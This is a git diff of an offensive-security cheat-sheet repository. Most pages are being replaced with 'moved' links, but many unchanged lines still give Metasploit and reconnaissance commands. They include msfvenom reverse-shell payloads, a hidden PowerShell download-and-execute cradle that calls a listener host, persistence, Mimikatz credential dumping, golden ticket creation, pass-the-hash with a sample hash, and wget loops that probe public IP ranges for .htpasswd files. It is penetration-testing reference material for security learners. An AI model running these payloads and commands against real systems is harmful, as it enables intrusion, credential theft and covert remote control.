 	* [Execute Procedure on Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-procedure-on-linked-database)
 	* [Determine Names of Linked Databases ](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#determine-names-of-linked-databases)
 	* [Determine All the Tables Names from a Selected Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#determine-all-the-tables-names-from-a-selected-linked-database)
 	* [Gather the Top 5 Columns from a Selected Linked Table](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-the-top-5-columns-from-a-selected-linked-table)
 	* [Gather Entries from a Selected Linked Column](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-entries-from-a-selected-linked-column)
 * [Command Execution via xp_cmdshell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#command-execution-via-xp_cmdshell)
 * [Extended Stored Procedure](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#extended-stored-procedure)
 	* [Add the extended stored procedure and list extended stored procedures](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
 * [CLR Assemblies](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#clr-assemblies)
 	* [Execute commands using CLR assembly](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-using-clr-assembly)
 	* [Manually creating a CLR DLL and importing it](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#manually-creating-a-clr-dll-and-importing-it)
 * [OLE Automation](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#ole-automation)
 	* [Execute commands using OLE automation procedures](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-using-ole-automation-procedures)
 * [Agent Jobs](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#agent-jobs)
 	* [Execute commands through SQL Agent Job service](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-through-sql-agent-job-service)
 	* [List All Jobs](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-jobs)
 * [External Scripts](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#external-scripts)
    * [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#python)
    * [R](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#r)
 * [Audit Checks](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#audit-checks)
 	* [Find and exploit impersonation opportunities](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-and-exploit-impersonation-opportunities) 
 * [Find databases that have been configured as trustworthy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-databases-that-have-been-configured-as-trustworthy)
 * [Manual SQL Server Queries](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#manual-sql-server-queries)
 	* [Query Current User & determine if the user is a sysadmin](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#query-current-user--determine-if-the-user-is-a-sysadmin)
 	* [Current Role](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#current-role)
 	* [Current DB](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#current-db)
 	* [List all tables](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-tables)
 	* [List all databases](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-databases)
 	* [All Logins on Server](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#all-logins-on-server)
 	* [All Database Users for a Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#all-database-users-for-a-database) 
 	* [List All Sysadmins](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-sysadmins)
 	* [List All Database Roles](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-database-role)
 	* [Effective Permissions from the Server](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#effective-permissions-from-the-server)
 	* [Effective Permissions from the Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#effective-permissions-from-the-database)
 	* [Find SQL Server Logins Which can be Impersonated for the Current Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
 	* [Exploiting Impersonation](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#exploiting-impersonation)
 	* [Exploiting Nested Impersonation](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#exploiting-nested-impersonation)
 	* [MSSQL Accounts and Hashes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#mssql-accounts-and-hashes)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#references)
--- a/Resources/Metasploit
+++ b/Resources/Metasploit
@@ -1,222 +1,23 @@
 # Metasploit
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/command-control/metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/)
-* [Installation](#installation)
+* [Installation](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#installation)
-* [Sessions](#sessions)
+* [Sessions](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#sessions)
-* [Background handler](#background-handler)
+* [Background handler](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#background-handler)
-* [Meterpreter - Basic](#meterpreter---basic)
+* [Meterpreter - Basic](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter---basic)
-    * [Generate a meterpreter](#generate-a-meterpreter)
+    * [Generate a meterpreter](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#generate-a-meterpreter)
-    * [Meterpreter Webdelivery](#meterpreter-webdelivery)
+    * [Meterpreter Webdelivery](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter-webdelivery)
-    * [Get System](#get-system)
+    * [Get System](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#get-system)
-    * [Persistence Startup](#persistence-startup)
+    * [Persistence Startup](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#persistence-startup)
-    * [Portforward](#portforward)
+    * [Network Monitoring](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#network-monitoring)
-    * [Upload / Download](#upload---download)
+    * [Portforward](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#portforward)
-    * [Execute from Memory](#execute-from-memory)
+    * [Upload / Download](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#upload---download)
-    * [Mimikatz](#mimikatz)
+    * [Execute from Memory](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#execute-from-memory)
-    * [Pass the Hash - PSExec](#pass-the-hash---psexec)
+    * [Mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#mimikatz)
-* [Scripting Metasploit](#scripting-metasploit)
+    * [Pass the Hash - PSExec](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#pass-the-hash---psexec)
-* [Multiple transports](#multiple-transports)
+    * [Use SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#use-socks-proxy)
-* [Best of - Exploits](#best-of---exploits)
+* [Scripting Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#scripting-metasploit)
-* [References](#references)
+* [Multiple transports](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#multiple-transports)
-
+* [Best of - Exploits](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#best-of---exploits)
-## Installation
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#references)
 ```powershell
 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
 ```
 or docker
 ```powershell
 sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
 ```
 ## Sessions
 ```powershell
 CTRL+Z   -> Session in Background
 sessions -> List sessions
 sessions -i session_number -> Interact with Session with id
 sessions -u session_number -> Upgrade session to a meterpreter
 sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter
 sessions -c cmd           -> Execute a command on several sessions
 sessions -i 10-20 -c "id" -> Execute a command on several sessions
 ```
 ## Background handler
 ExitOnSession : the handler will not exit if the meterpreter dies.
 ```powershell
 screen -dRR
 sudo msfconsole
 use exploit/multi/handler
 set PAYLOAD generic/shell_reverse_tcp
 set LHOST 0.0.0.0
 set LPORT 4444
 set ExitOnSession false
 generate -o /tmp/meterpreter.exe -f exe
 to_handler
 [ctrl+a] + [d]
 ```
 ## Meterpreter - Basic
 ### Generate a meterpreter
 ```powershell
 $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
 $ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
 $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
 $ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
 $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
 $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
 ```
 ### Meterpreter Webdelivery
 Set up a Powershell web delivery listening on port 8080.
 ```powershell
 use exploit/multi/script/web_delivery
 set TARGET 2
 set payload windows/x64/meterpreter/reverse_http
 set LHOST 10.0.0.1
 set LPORT 4444
 run
 ```
 ```powershell
 powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');
 ```
 ### Get System
 ```powershell
 meterpreter > getsystem
 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 ```
 ### Persistence Startup
 ```powershell
 OPTIONS:
 -A        Automatically start a matching exploit/multi/handler to connect to the agent
 -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
 -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
 -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
 -T <opt>  Alternate executable template to use
 -U        Automatically start the agent when the User logs on
 -X        Automatically start the agent when the system boots
 -h        This help menu
 -i <opt>  The interval in seconds between each connection attempt
 -p <opt>  The port on which the system running Metasploit is listening
 -r <opt>  The IP of the system running Metasploit listening for the connect back
 meterpreter > run persistence -U -p 4242
 ```
 ### Portforward
 ```powershell
 portfwd add -l 7777 -r 172.17.0.2 -p 3006
 ```
 ### Upload / Download
 ```powershell
 upload /path/in/hdd/payload.exe exploit.exe
 download /path/in/victim
 ```
 ### Execute from Memory
 ```powershell
 execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w
 ```
 ### Mimikatz
 ```powershell
 load mimikatz
 mimikatz_command -f version
 mimikatz_command -f samdump::hashes
 mimikatz_command -f sekurlsa::wdigest
 mimikatz_command -f sekurlsa::searchPasswords
 mimikatz_command -f sekurlsa::logonPasswords full
 ```
 ```powershell
 load kiwi
 creds_all
 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
 ```
 ### Pass the Hash - PSExec
 ```powershell
 msf > use exploit/windows/smb/psexec
 msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
 msf exploit(psexec) > exploit
 SMBDomain             WORKGROUP                                                          no        The Windows domain to use for authentication
 SMBPass               598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf  no        The password for the specified username
 SMBUser               Lambda                                                             no        The username to authenticate as
 ```
 ## Scripting Metasploit
 Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.
 Here is a simple example to script the deployment of a handler an create an Office doc with macro.
 ```powershell
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
 set LPORT 4646
 set ExitOnSession false
 exploit -j -z
 use exploit/multi/fileformat/office_word_macro 
 set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 10.10.14.22
 set LPORT 4646
 exploit
 ```
 ## Multiple transports
 ```powershell
 msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe
 ```
 Then, in AddTransports.ps1
 ```powershell
 Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
 Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
 ```
 ## Best of - Exploits
 * MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
 * MS08_67 - `exploit/windows/smb/ms08_067_netapi`
 ## References
 * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
 * [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331)
--- a/Resources/Methodology
+++ b/Resources/Methodology
@@ -1,294 +1,17 @@
 # Bug Hunting Methodology and Enumeration
 :warning: Content of this page has been moved to [InternalAllTheThings/methodology/bug-hunting-methodology](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/)
 ## Summary
-* [Passive Recon](#passive-recon)
+* [Passive Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#passive-recon)
  * Shodan
  * Wayback Machine
  * The Harvester
  * Github OSINT
-* [Active Recon](#active-recon)
+* [Active Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#active-recon)
-  * Masscan
+  * [Network discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#network-discovery)
-  * Nmap
+  * [Web discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#web-discovery)
  * Nmap Script
  * RPCClient
  * Enum4all
-* [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
+* [Web Vulnerabilities](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#looking-for-web-vulnerabilities)
  * Gobuster
  * Backup File Artifacts Checker
 * [Web Vulnerabilities](#looking-for-web-vulnerabilities)
  * Repository Github
  * Burp
  * Web Checklist
  * Nikto
  * Payment functionality
 ## Passive recon
 * Using Shodan (https://www.shodan.io/) to detect similar app
  ```bash
  can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
  nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
  ```
 * Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints
  ```bash
  look for JS files, old links
  ```
 * Using The Harvester (https://github.com/laramies/theHarvester)
  ```python
  python theHarvester.py -b all -d domain.com
  ```
 ## Active recon
 * Masscan
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
 ```
 * Basic NMAP
  ```bash
  sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
  sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
  • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
  • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
  • 192.168.0.1 is the IP address to scan
  • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
  • -iL INPUTFILE tells Nmap to use the provided file as inputs
  ```
 * CTF NMAP
  This configuration is enough to do a basic check for a CTF VM
  ```bash
  nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
  -sV : Probe open ports to determine service/version info
  -sC : to enable the script
  -oA : to save the results
  After this quick command you can add "-p-" to run a full scan while you work with the previous result
  ```
 * Aggressive NMAP
  ```bash
  nmap -A -T4 scanme.nmap.org
  • -A: Enable OS detection, version detection, script scanning, and traceroute
  • -T4: Defines the timing for the task (options are 0-5 and higher is faster)
  ```
 * NMAP and add-ons
  * Using searchsploit to detect vulnerable services
    ```bash
    nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
    ```
  * Generating nice scan report
    ```bash
    nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
    ```
 * NMAP Scripts
  ```bash
  nmap -sC : equivalent to --script=default
  nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
  PORT   STATE SERVICE
  80/tcp open  http
  | http-enum:
  |   /phpmyadmin/: phpMyAdmin
  |   /.git/HEAD: Git folder
  |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
  |_  /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
  nmap --script smb-enum-users.nse -p 445 [target host]
  Host script results:
  | smb-enum-users:
  |   METASPLOITABLE\backup (RID: 1068)
  |     Full name:   backup
  |     Flags:       Account disabled, Normal user account
  |   METASPLOITABLE\bin (RID: 1004)
  |     Full name:   bin
  |     Flags:       Account disabled, Normal user account
  |   METASPLOITABLE\msfadmin (RID: 3000)
  |     Full name:   msfadmin,,,
  |     Flags:       Normal user account
  List Nmap scripts : ls /usr/share/nmap/scripts/
  ```
 * RPCClient
  ```bash
  ╰─$ rpcclient -U "" [target host]
  rpcclient $> querydominfo
  Domain: WORKGROUP
  Server: METASPLOITABLE
  Comment: metasploitable server (Samba 3.0.20-Debian)
  Total Users: 35
  rpcclient $> enumdomusers
  user:[games] rid:[0x3f2]
  user:[nobody] rid:[0x1f5]
  user:[bind] rid:[0x4ba]
  ```
 * Enum4all
  ```bash
  Usage: ./enum4linux.pl [options]ip
  -U        get userlist
  -M        get machine list*
  -S        get sharelist
  -P        get password policy information
  -G        get group and member list
  -d        be detailed, applies to -U and -S
  -u user   specify username to use (default “”)
  -p pass   specify password to use (default “”
  -a        Do all simple enumeration (-U -S -G -P -r -o -n -i).
  -o        Get OS information
  -i        Get printer information
  ==============================
  |   Users on XXX.XXX.XXX.XXX |
  ==============================
  index: 0x1 Account: games Name: games Desc: (null)
  index: 0x2 Account: nobody Name: nobody Desc: (null)
  index: 0x3 Account: bind Name: (null) Desc: (null)
  index: 0x4 Account: proxy Name: proxy Desc: (null)
  index: 0x5 Account: syslog Name: (null) Desc: (null)
  index: 0x6 Account: user Name: just a user,111,, Desc: (null)
  index: 0x7 Account: www-data Name: www-data Desc: (null)
  index: 0x8 Account: root Name: root Desc: (null)
  ```  
 * Zone Transfer
  ```powershell
  host -t ns domain.local
  domain.local name server master.domain.local.
  host master.domain.local        
  master.domain.local has address 192.168.1.1
  dig axfr domain.local @192.168.1.1
  ```
 ## List all the subdirectories and files
 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
  ```bash
  git clone https://github.com/mazen160/bfac
  Check a single URL
  bfac --url http://example.com/test.php --level 4
  Check a list of URLs
  bfac --list testing_list.txt
  ```
 * Using DirBuster or GoBuster
  ```bash
  ./gobuster -u http://buffered.io/ -w words.txt -t 10
  -u url
  -w wordlist
  -t threads
  More subdomain :
  ./gobuster -m dns -w subdomains.txt -u google.com -i
  gobuster -w wordlist -u URL -r -e
  ```
 * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
  ```bash
  #!/bin/bash
  for ipa in 98.13{6..9}.{0..255}.{0..255}; do
  wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
  ```
 * Using a script to detect all .htpasswd files in a range of IPs
  ```bash
  #!/bin/bash
  for ipa in 98.13{6..9}.{0..255}.{0..255}; do
  wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
  ```
 ## Looking for Web vulnerabilities
 * Look for private information in GitHub repos with GitRob
  ```bash
  git clone https://github.com/michenriksen/gitrob.git
  gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
  ```
 * Explore the website with a proxy (ZAP/Burp Suite)
  1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
  2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
  3. Explore and understand available functionality, noting areas that correspond to vulnerability types
    ```bash
    Burp Proxy configuration on port 8080 (in .bashrc):
    alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
    alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
    then launch Burp with : java -jar burpsuite_free_v*.jar &
    ```
 * [Checklist for Web vulns](http://mdsec.net/wahh/tasks.html)
 * Subscribe to the site and pay for the additional functionality to test
 * Launch a Nikto scan in case you missed something
  ```powershell
  nikto -h http://domain.example.com
  ```
 * Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392)
  > if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free
  From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. "
  e.g :
 Test card numbers and tokens  
 | NUMBER           | BRAND          | TOKEN          |
 | :-------------   | :------------- | :------------- |
 | 4242424242424242 | Visa           | tok_visa       |
 | 4000056655665556 | Visa (debit)   | tok_visa_debit |
 | 5555555555554444 | Mastercard     | tok_mastercard |
 International test card numbers and tokens     
 | NUMBER           | TOKEN          | COUNTRY        | BRAND          |
 | :-------------   | :------------- | :------------- | :------------- |
 | 4000000400000008 | tok_at         | Austria (AT)   | Visa           |
 | 4000000560000004 | tok_be         | Belgium (BE)   | Visa           |
 | 4000002080000001 | tok_dk         | Denmark (DK)   | Visa           |
 | 4000002460000001 | tok_fi         | Finland (FI)   | Visa           |
 | 4000002500000003 | tok_fr         | France (FR)    | Visa           |
 ## References
 * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
 * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
--- a/Resources/Miscellaneous
+++ b/Resources/Miscellaneous
@@ -0,0 +1,27 @@
 # Miscellaneous & Tricks
 All the tricks that couldn't be classified somewhere else.
 ## Send a message to another user
 ```powershell
 # Windows
 PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
 PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
 # Linux
 $ wall "Stop messing with the XXX service !"
 $ wall -n "System will go down for 2 hours maintenance at 13:00 PM"  # "-n" only for root
 $ who
 $ write root pts/2	# press Ctrl+D  after typing the message. 
 ```
 ## CrackMapExec Credential Database
 ```ps1
 cmedb (default) > workspace create test
 cmedb (test) > workspace default
 cmedb (test) > proto smb
 cmedb (test)(smb) > creds
 cmedb (test)(smb) > export creds csv /tmp/creds
 ```
--- a/Resources/Network
+++ b/Resources/Network
@@ -1,160 +1,14 @@
 # Network Discovery
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/network-discovery](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/)
- [Nmap](#nmap)
+- [Nmap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#nmap)
- [Masscan](#masscan)
+- [Network Scan with nc and ping](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#network-scan-with-nc-and-ping)
- [Netdiscover](#netdiscover)
+- [Spyse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#spyse)
- [Responder](#responder)
+- [Masscan](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#masscan)
- [Bettercap](#bettercap)
+- [Netdiscover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#netdiscover)
- [Reconnoitre](#reconnoitre)
+- [Responder](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#responder)
- [References](#references)
+- [Bettercap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#bettercap)
-
+- [Reconnoitre](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#reconnoitre)
-## Nmap
+- [SSL MITM with OpenSSL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#ssl-mitm-with-openssl)
-
+- [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#references)
 * Ping sweep (No port scan, No DNS resolution)
 ```powershell
 nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
 -sn : Disable port scanning. Host discovery only.
 -n : Never do DNS resolution
 ```
 * Basic NMAP
 ```bash
 sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
 sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
 • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
 • 192.168.0.1 is the IP address to scan
 • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
 • -iL INPUTFILE tells Nmap to use the provided file as inputs
 ```
 * CTF NMAP
 This configuration is enough to do a basic check for a CTF VM
 ```bash
 nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
 -sV : Probe open ports to determine service/version info
 -sC : to enable the script
 -oA : to save the results
 After this quick command you can add "-p-" to run a full scan while you work with the previous result
 ```
 * Aggressive NMAP
 ```bash
 nmap -A -T4 scanme.nmap.org
 • -A: Enable OS detection, version detection, script scanning, and traceroute
 • -T4: Defines the timing for the task (options are 0-5 and higher is faster)
 ```
 * Using searchsploit to detect vulnerable services
 ```bash
 nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
 ```
 * Generating nice scan report
 ```bash
 nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
 ```
 * NMAP Scripts
 ```bash
 nmap -sC : equivalent to --script=default
 nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
 PORT   STATE SERVICE
 80/tcp open  http
 | http-enum:
 |   /phpmyadmin/: phpMyAdmin
 |   /.git/HEAD: Git folder
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
 |_  /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
 nmap --script smb-enum-users.nse -p 445 [target host]
 Host script results:
 | smb-enum-users:
 |   METASPLOITABLE\backup (RID: 1068)
 |     Full name:   backup
 |     Flags:       Account disabled, Normal user account
 |   METASPLOITABLE\bin (RID: 1004)
 |     Full name:   bin
 |     Flags:       Account disabled, Normal user account
 |   METASPLOITABLE\msfadmin (RID: 3000)
 |     Full name:   msfadmin,,,
 |     Flags:       Normal user account
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 ## Masscan
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
 masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
 masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
 ```
 ## Reconnoitre
 Dependencies:
 * nbtscan
 * nmap
 ```powershell
 python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick
 ```
 If you have a segfault with nbtscan, read the following quote.
